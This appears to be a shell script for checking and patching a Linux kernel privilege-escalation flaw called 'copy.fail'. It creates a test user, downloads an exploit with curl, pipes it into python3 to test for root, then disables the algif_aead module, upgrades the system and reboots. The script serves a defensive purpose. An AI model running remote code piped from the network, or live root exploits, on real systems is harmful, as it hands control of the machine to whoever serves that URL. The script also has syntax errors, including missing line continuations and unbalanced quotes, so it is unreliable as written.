sysmisc/fix-copy-fail.sh

#!/usr/bin/sh
# Copyright (c) 2026 Corwin Brust <corwin@bru.st>
#
# This program is free software: you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation, either version 3 of the License, or
#  (at your option) any later version.
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#  You should have received a copy of the GNU General Public License
#  along with this program.  If not, see <https://www.gnu.org/licenses/>.
#

# Delete the test user if it exists
# NOTE: this make the script repeatable however
# it will still abandon the 'testu' account
#
# To remove the test account after patching:
#   deluser testu 
#
grep '^testu ' /etc/passwd && deluser testu;

# Note this may not work all in one shot
# due to the exploit screwing with the kernel
# usermap resident in memory.

adduser --disabled-password --gecos='""' testu \
  && su testu -c 'cd; curl https://copy.fail/exp | python3 && su -c id' | grep root \
   && echo "EXPLOIT DETECTED: copy.fail  FFI, please see: https://copy.fail" \
   && echo
   && echo "The system MUST be restarted before confirming the fix."
   && echo "If changes are made this should happen automatically but do it manually if that fails."
   && echo
   && echo "Pausing for ten seconds before attempting to fix..""
   && sleep 10 \
   && echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf \
   && rmmod algif_aead \
   && apt-get update -y && apt-get upgrade -y && apt-get full-upgrade -y && shutdown -r now \
   || echo "Check halted: check above for error messages.\n" \
           "If the only error message you see if from grep you patched for copy.fail."